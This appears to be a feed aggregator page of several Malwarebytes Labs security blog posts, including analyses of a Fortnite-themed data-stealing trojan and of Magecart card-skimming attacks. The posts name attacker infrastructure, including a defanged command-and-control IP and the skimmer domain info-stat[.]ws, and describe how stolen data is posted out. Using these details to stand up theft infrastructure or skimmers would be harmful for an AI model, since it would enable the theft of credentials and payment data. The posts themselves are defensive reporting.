  • Train your staff on basic computer hygiene, such as avoiding tech support scams, steering clear of links to unknown sources, and never opening attachments from suspicious emails. In addition, make sure they’re aware of what to do and what not to do in the event of a breach.
  • Create a fair policy that has been clearly communicated so that employees understand what is acceptable and what the consequences might be if they don’t comply.
  • Encrypt file storage and communications to lessen the chances of vital information or data falling into the wrong hands.
  • Ensure timely software updates for all. What’s the use of a system admin rushing to check, verify, and install updates when there are some devices roaming around that are a few patches behind.
  • Use a VPN for off-site communications to rule out eaves-dropping and man-in-the-middle attacks.

There are pros and cons to most BYOS and BYOD scenarios—however, if a company’s IT team and workforce is prepared, many of these situations have a good chance to work out in the best interest of all involved.

Awareness of the possible implications is always a good starting point. Vigilance is security’s better half.

The post Bring your own security (BYOS): good idea or not? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fortnite gamers targeted by data theft malware

Malwarebytes - Tue, 10/02/2018 - 14:00

The new season of the incredibly popular video game Fortnite is upon us, and so too are the scams. It’s no surprise that con artists would jump on this bandwagon, eager to peddle their fakeouts.

Only this time, scammers had something a little more dangerous in mind than your typical low-level surveys and downloads that never actually materialize. Among all the gluttony of scams there hid a malicious file ready to steal data and enumerate Bitcoin wallets, for starters.

How did we find it? First, we sifted through a sizable mish-mash of free season six passes, supposedly “free” Android versions of Fortnite, which were leaked out from under the developer’s noses, the ever-popular blast of “free V-Bucks” used to purchase additional content in the game, and a lot of bogus cheats, wallhacks, and aimbots.

Here’s the current state of YouTube, for example:

Click to enlarge

These videos can drive huge numbers: Here’s one that’s been pulled down, but managed to rack up 120,000 views before the hammer fell:

Click to enlarge

Almost all of the scam tomfoolery followed the typical survey route, as expected. But buried in all of this was a nasty little slice of data theft malware disguised as a cheat tool.

Offering up a malicious file under the pretense of a cheat is as old school as it gets, but that’s never stopped cybercriminals before. In this scenario, would-be cheaters suffer a taste of their own medicine via a daisy chain of clickthroughs and (eventually) some malware as a parting gift. Shall we take a look?

Setting the scene

The YouTube account offering this scam up has a little over 700 subscribers, and the video in question already had more than 2,200 views the day after being uploaded.

Click to enlarge

Clicking the link sends potential victims to a page on Sub2Unlock. This site differs from typical survey pages, where you’d normally click offers or fill in questions to obtain a theoretical reward. Instead, it asks you to hit subscribe on the social portal of the person sending you there in the first place. So there’s one difference, right off the bat.

Click to enlarge

Another interesting difference is that any initial survey page requires you to physically complete a survey before progressing. Without doing this, you can’t gain access to a download link.

Here, we had no validation taking place during our testing. Clicking the subscribe button simply opened up the YouTube channel’s subscribe page but nothing checked to ensure we’d actually subscribed. All we had to do at this point was go back to the Sub2Unlock site and click the download button.

From here, gamers are whisked away to a site located at


Click to enlarge

This site is a fairly good-looking portal claiming to offer up the desired cheat tools, and it stands a fair chance of convincing youngsters of its legitimacy. A little bit more button clicking, and potential victims are taken to a more general download site containing what appears to be an awful lot of files alongside a wide range of adverts.

Click to enlarge

As far as the malicious file in question goes, at time of writing, 1,207 downloads had taken place. That’s 1,207 downloads too many.

File information

Malwarebytes detects this file as Trojan.Malpack, a generic detection given to files packed suspiciously. The actual payload could be anything at all, but it will invariably be up to no good. In this case, a little digging showed us the payload is a data stealer.

Once the initial .EXE (which weighs in at just 168KB) runs on the target system, it performs some basic enumeration on details specific to the infected computer. It then attempts to send data via a POST command to an /index.php file in the Russian Federation, courtesy of the IP address 5(dot)101(dot)78(dot)169.

Some of the most notable things it takes an interest in are browser session information, cookies, Bitcoin wallets, and also Steam sessions.

Click to enlarge

Bizarrely, it also wrote this to our test system:

Click to enlarge

…Grateful Dead, anyone?

The IP address up above has been seen many times in relation to similarly named/themed files.

Lots of the files contained in this download are packed in entirely different ways. One of them has a process called “Stealer.exe.” Many more post the stolen information to /gate.php instead of index.php, which is a common sign of Zbot and a few others.

While this particular file probably isn’t that new, it’s still going to do a fair bit of damage to anyone that runs in. Combining it with the current fever for new Fortnite content is a recipe for stolen data and a lot of cleanup required afterward.

As a final note, we should mention the readme file accompanying the stealer advertises being able to purchase additional Fortnite cheats for “$80 Bitcoin.”

Click to enlarge

Given how things up above panned out, we’d advise anyone tempted to cheat to steer well clear of this one. Winning is great, but it’s absolutely not worth risking a huge slice of personal information to get the job done.

The post Fortnite gamers targeted by data theft malware appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 24 – 30)

Malwarebytes - Mon, 10/01/2018 - 16:44

Last week on Labs was a busy one. We discussed how SMS phishing attacks target the job market, issued a warning for TV Licensing phishes, commented on how Apple confused Safari users with recent changes to how OSX handles browser extensions, and elaborated on holes found in Mojave’s privacy protection—deep breath! We also showed how a buggy implementation of CVE-2018-8373 vulnerability is used to deliver Quasar RAT, discussed what is needed to fight back in the age of unwanted calls, gave some tips on how to protect your data from Magecart and other e-commerce attacks, and alerted our readers that millions of accounts were affected in the latest Facebook vulnerability.

Other cybersecurity news:
  • Tech firms back US privacy law to negate states. (Source: The Washington Post)
  • Microsoft rolls out confidential computing for Azure. (Source: Bleeping Computer)
  • Google recently made a change to simplify the way Chrome handles sign-in. (Source: The Keyword)
  • VirusTotal announces VirusTotal Enterprise. (Source:
  • 14 years imprisonment for man who helped hackers evade detection by antivirus software. (Source: Hot for Security)
  • Port of San Diego’s information technology systems disrupted by ransomware. (Source: Port of San Diego)
  • LoJax: the first UEFI rootkit found in the wild, courtesy of the Sednit group. (Source: WeLiveSecurity}
  • Telegram leaks public/private IP addresses of end users in desktop. (Source: inputzero)
  • iPhone XS passcode bypass hack exposes contacts and photos. (Source: ThreatPost)
  • Secret Service warns of surge in ATM ‘wiretapping’ attacks. (Source: Krebs on Security)
  • Mutagen Astronomy: Linux kernel ‘give me root, now’ security hole sighted. (Source: TheRegister)

Stay safe, everyone!

The post A week in security (September 24 – 30) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Malwarebytes is a champion of National Cyber Security Awareness Month

Malwarebytes - Mon, 10/01/2018 - 14:00

October is here. For most of us in the US cybersecurity industry, it’s the month when we commemorate National Cybersecurity Awareness Month (NCSAM). For those who are unfamiliar with this campaign, NCSAM generally aims at driving awareness for safe Internet use, whether you’re a regular consumer or top security executive. Protecting the Internet and keeping it safe is our shared responsibility.

And that’s why we at Malwarebytes not only pledge to provide the best protection for our home and business customers. We also commit ourselves to fostering cybersecurity education and awareness for all. Labs security researchers and writers are on the front lines every day, scouring the Internet for threats and reporting them, as well as how you can stay safe against them, here on the blog. We hope you continue to feel safe knowing we will always do our best to stop attacks, stomp out dangerous malware, and swat away annoying scammers.

In its 15th iteration, this year NCSAM will attempt to address current cybersecurity challenges, focusing on securing families and their homes, building a robust, cyber-aware workforce, and securing critical infrastructures. As such, themes assigned for each week of the month have been aligned according to this year’s objectives.

Below are the themes per week, a brief overview of each, and helpful links we recommend you, dear reader, start perusing.

Week 1: October 1–5

Theme: “Make Your Home a Haven for Online Safety”

NCSAM kicks off its campaign by going back to basics. Parents and caregivers, it’s time to brush up on your cybersecurity know-how and get your kids and the entire family involved. Check out these helpful Malwarebytes Labs posts if you need some inspiration:

Week 2: October 8–12

Theme: “Millions of Rewarding Jobs: Educating for a Career in Cybersecurity”

As that song goes, “I believe the children are our future.” And we believe that they can make a difference—for better or for worse—on the state of cybersecurity and the future of the Internet as we know it. Schools and teachers play a significant role in shaping the way our kids view and respond to the world, both in their real and digital lives. By molding young minds to be good citizens of the Internet and encouraging careers that honor that code, you can help clear the way for a better online experience for generations to come. Here are some references you may want to read up on:

Week 3: October 15–19

Theme: “It’s Everyone’s Job to Ensure Online Safety at Work”

The shortage of cybersecurity professionals is a genuine problem, especially for businesses that rely on a tight-running and secure ship to keep profit flowing and customers happy. A way to address this shortage is to change the tide by educating current personnel about the importance of taking cybersecurity seriously and how to respond in the event of a cyberattack. Small, medium, and enterprise-sized businesses can pilfer useful nuggets of wisdom from these blog posts:

Week 4: October 22–26

Theme: “Safeguarding the Nation’s Critical Infrastructure”

The uncovering of Stuxnet nearly a decade ago completely changed the way we see our critical infrastructures. Since then, there has been an active call to secure the 16 sectors that literally keep a nation running—and for a good reason. Lives are at stake.

While protecting our critical infrastructure may seem like a specialized topic dedicated to a particular audience, it’s not. Those working in the financial, health, and communications sectors, as well as in energy, electricity, and other utilities can contribute by taking on the seemingly impossible task of securing their organizations.

Note that good security hygiene is a start, but efforts shouldn’t stop there. We’ll explore this topic in depth come November, when we’ll be looking at election security and commemorating Critical Infrastructure and Resilience Month. For now, you can read through these posts for helpful insights:

If you or your organization want to take part in NCSAM, it’s never too late to register. You can visit the StaySafeOnline website and navigate to the Become a Champion menu link. After registering, you or your organization will be listed in the 2018 Champions page and receive helpful resources to educate yourself and spread awareness to others.

As always: Stay safe, everyone!

See also:

The post Malwarebytes is a champion of National Cyber Security Awareness Month appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Millions of accounts affected in latest Facebook hack

Malwarebytes - Fri, 09/28/2018 - 19:39

Facebook announced earlier today that its social network had been hacked, resulting in 40 million accounts that were directly impacted, while another 50 million were also considered to be potentially affected.

Attackers exploited a feature in Facebook called “View As,” which essentially shows how your profile looks to others. The flaw enabled them to get ahold of so-called Access Tokens, which allowed them to be logged in as genuine Facebook users without having to use their password.

The feature has for now being turned off and the underlying vulnerability fixed. A law enforcement investigation is ongoing to determine the full scope of this hack and identify the eventual perpetrators.

Facebook says they have taken actions and that there is no need for users to reset their passwords, although it is a good opportunity remind users that passwords should be complex and not reused across multiple services.

We recommend people follow the Facebook hack story to get a better idea of what exactly was accessed and take the necessary precautions. We will keep Labs readers informed of further developments.

The post Millions of accounts affected in latest Facebook hack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to protect your data from Magecart and other e-commerce attacks

Malwarebytes - Fri, 09/28/2018 - 15:00

In today’s golden age of online shopping, consumers take to the Internet, punch in a few credit card details, and happily receive products at their doorstep, safe in the knowledge that their online vendor is well-known, vetted, and therefore their website has to be secure, right? Dut did you know that hackers can steal your credit card details with only a few lines of JavaScript?

Attacks on websites with the purpose of collecting user submitted data are hardly new. Magento, the open-source e-commerce platform, has been the target of such hacks for years.

By compromising websites that are also used as payment platforms, harvesting credit card numbers and other private, personally identifiable information (PII) on-the-fly is a surprisingly easy and lucrative process.

In a sense, this is the digital equivalent of credit card skimming, a process of grabbing someone’s credit card details at a physical ATM. In the same fashion that criminals can tamper with the ATM, so too can they with a website’s checkout page.

In recent months, there has been a steady increase of such attacks going after smaller websites and major companies alike. This blog post will review some of the most recent events we’ve witnessed, and offer some mitigation techniques for a threat that intends to fly under the radar.

Third-party compromises

Attackers can compromise a website using many different techniques, often by exploiting vulnerabilities or weak passwords. When that is not possible, they often target a third-party library that the site relies on, which perhaps is not as secure.

An added benefit of third-party compromises is the scalability of the attack. By hacking into one provider, you can affect an entire group of websites that depend on it.

The malicious code below was appended to a legitimate and trusted script in an obfuscated format. This is the work of Magecart, the name given to a group of threat actors responsible for several high profile attacks recently.

After decoding the script, we can see the code responsible for harvesting the data when customers hit the checkout button. At the network level, this looks like a POST request where each field (name, address, credit card number, expiry date, CVV, etc.) is sent in Base64 format to the rogue server (info-stat[.]ws) controlled by the criminals:

This kind of attack happens transparently to both the merchant and customer. In contrast to breaches that involve leaked databases where the information may be encrypted, web skimmers are able to collect your data in clear text and in real-time.

British Airways case

Between August and September 2018, British Airways suffered a Magecart attack for 15 days, which was highly targeted so as not to raise suspicions from site visitors or administrators.

A JavaScript library was tampered with and mixed into the payment flow in a way that blended it seamlessly into the background. In fact, the script itself was loaded in from the baggage claims information page and the attackers even paid for an SSL certificate for the server to which they sent stolen data. They could have used a free certificate like so many other scammers do, but they likely wanted to avoid red flags and make everything look as legitimate as possible. If they hadn’t taken so many precautions, they may well have been discovered a lot earlier.

In terms of data stolen, the attackers managed to claim both PII and payment details. The attack was so comprehensive that Magecart was even able to swipe data from mobile app users, due to portions of the site loading inside the app itself and the attackers ensuring they had a few pieces of mobile-specific code ready and waiting.

That they were able to pull off such an attack, alongside having so much internal access to the British Airways site itself, is deeply alarming. It isn’t just payment information being made available to airlines on a daily basis—it’s passport details, birthdates, and other incredibly personal information. Thankfully, British Airways confirmed that no travel data was taken. But in terms of potential fallout, including the inevitable post-attack data leaks and blackmails attempts—this attack above all others could have been catastrophic.


There is no silver bullet in preventing web-skimming attacks, but there are still measures that can be taken to mitigate the risks.

Merchants (server-side)

Operating an e-commerce website comes with certain responsibilities, especially if payment information is handled through it. It is usually a safer (and easier) practice to outsource the handling of financial transactions to larger, trusted parties. PCI compliance and risks associated with collecting data can be overwhelming, especially for site owners that would rather focus on the business side of things.

There are too many aspects of website security to cover here in how to keep your own site from getting hacked, so instead we will focus on a third-party compromise scenario.

Third-party resource integrity checking is one security aspect that has been overlooked but can provide great benefits when loading external content. The reality is that a website usually cannot host all the content itself, and it makes more sense to rely on CDNs and other providers for speed and cost reasons.

This relationship does not necessarily mean having to weather the issues experience by a third party. While in this post we have focused on credit card stealers, there are a number of other threats that can be disseminated via third-party libraries. For this reason, implementing safeguards such as Content Security Policy (CSP) and Subresource Integrity (SRI) can help to mitigate many issues.

Consumers (Client-side)

One thing to keep in mind as consumers is that we are largely placing our trust in the online stores where we are shopping. For this reason, it may be wise to avoid smaller sites that perhaps do not have the same level of security as larger ones. Of course, with cases like British Airways or Newegg, this piece of advice shows its limitations.

Using browser plugins such as NoScript can prevent JavaScript loading from untrusted sites and therefore reduces the surface of attack. However, it has the same shortcomings when malicious code is embedded in already trusted resources.

Magecart and other web skimmers can be mitigated at the exfiltration layer, by blocking connections to known domains and IPs used by the attackers. It is not full-proof, though, considering how trivial it is to register new properties. But infrastructure reuse is something we still see quite often.

We will continue monitoring these threats and add related indicators of compromise (IOCs) to our database to protect our Malwarebytes customers.

The post How to protect your data from Magecart and other e-commerce attacks appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds